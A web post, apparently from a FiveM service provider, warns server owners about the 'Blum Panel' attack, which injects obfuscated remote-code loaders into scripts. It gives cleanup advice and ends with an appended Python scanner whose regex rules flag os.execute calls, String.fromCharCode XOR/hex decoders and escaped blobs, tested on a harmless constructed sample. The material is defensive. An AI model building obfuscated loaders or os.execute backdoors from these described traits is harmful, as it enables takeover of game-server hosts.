FiveM Blum Panel Attack
What is Blum Panel for FiveM?
We have operated for around 6 years, and until this week we had not heard of the Blum Panel. It is a tool people use to mass troll FiveM servers and players at once via a dashboard. It's basically a web FiveM admin dashboard that has been converted into a malicious tool. These sorts of attacks have been around for many years. They may appear harmless, just spamming text on your screen, but there is a more serious issue. If you have been affected, please read this post.
FiveM Blum Panel
If You Have Been Attacked By Blum Read This
The tool allows the attacker to remotely load code and run it on your machine. FiveM allows os.execute, which basically means they can do anything on your host, from creating new remote desktop logins to creating new admins. They can also access all your files and the information saved in your web browser, such as Gmail, banking or Discord. Anything you have used or done via your host, such as a Windows VPS, is now fully compromised. You must change all passwords and also do a full host reinstall and reset. Your server files are also infected: you will notice that they have pasted obfuscated code into most of your scripts. This all feeds back to the initial remote code loader.
Your server files are infected, you must remove all bad code and possibly rebuild to be safe.
Your host needs a full reset/reinstall to be safe.
Example Of Blums Code
How To Find The Code
Okay, so maybe you have been attacked and now your bum cheeks feel tight after reading all this. Do not fear. First you want to remove all the bad code, before creating a backup of your server files to be used later. You can use tools such as Visual Studio Code to easily search all your server files at once. We also created a free and fully open source tool you can use that may help. It will simply search your server files all at once and log
This Is Our Free Python Scanner Tool
Please do not rely on this solely; chances are the creators of the panel may see this tool, read the code and adjust their approach. Please manually check files and remove any scripts from leaks or obfuscated code inside. This tool will mass scan your entire server files at once for things that could be bad. If it finds something, it does not mean it's 100% bad; it is just alerting you about something that is possibly bad. You will also need to have Python and the required modules installed. You can download this tool by pressing the button below the picture.
This tool may stop responding for a few seconds whilst scanning your entire server resources. Let it load and do not touch it whilst it scans.
This tool is 100% open source with no hidden code, and you can check that it's safe, with AI or yourself, prior to running it.
Do not rely on this tool to find Blum's code; please also check manually.
You will need Python and requirements for this tool to work, we have some videos on our YouTube.
You can delete code via the tool - try to delete the code manually to avoid breaking a script.
FiveM Blum Panel Scanner Tool
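For readers who want to see what such a scan looks for, here is a small added example; it is not the scanner tool offered in this post. It flags script lines showing the traits of the injected code described above: a String.fromCharCode decoder (XOR or hex), a long run of \u00XX escapes, very long lines, and Lua os.execute calls. The rule names, thresholds and sample strings are assumptions made for illustration.

```python
import os
import re
import sys

# Heuristics and thresholds are assumptions; a hit means "review", not "malicious".
RULES = {
    "xor-decoder": re.compile(r"String\.fromCharCode\(\s*\w+\.charCodeAt\(\d*\)\s*\^"),
    "hex-decoder": re.compile(r"String\.fromCharCode\(\s*parseInt\(\s*\w+\s*,\s*16\s*\)"),
    "os.execute": re.compile(r"\bos\.execute\s*\("),
}
ESCAPE = re.compile(r"\\u00[0-9a-fA-F]{2}")
MIN_ESCAPES = 20   # assumed: this many \u00XX escapes on one line is unusual
MAX_LINE = 2000    # assumed: hand-written script lines are rarely this long

# Constructed samples: a clean line and a loader-shaped line with a harmless payload.
CLEAN = "RegisterCommand('hello', function() print('hi') end)\n"
INJECTED = ("local ok = true\nv=\"" + "\\u0009" * 25
            + "\".split('').map(c=>String.fromCharCode(c.charCodeAt(0)^3)).join('')\n")

def scan_text(text):
    """Return [(line_number, rule_name)] for one file's contents."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        hits += [(no, name) for name, rx in RULES.items() if rx.search(line)]
        if len(ESCAPE.findall(line)) >= MIN_ESCAPES:
            hits.append((no, "escaped-blob"))
        if len(line) > MAX_LINE:
            hits.append((no, "very-long-line"))
    return hits

def scan_tree(root, extensions=(".lua", ".js")):
    """Walk a server folder; return {relative_path: hits} for flagged scripts."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(extensions):
                continue
            path = os.path.join(folder, fname)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report

if __name__ == "__main__":
    for path, hits in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        for no, rule in hits:
            print(f"{path}:{no}: {rule}")
```

Run it with the server folder as the only argument. It only reads files and prints file:line hits, so every hit still needs a manual look before anything is deleted.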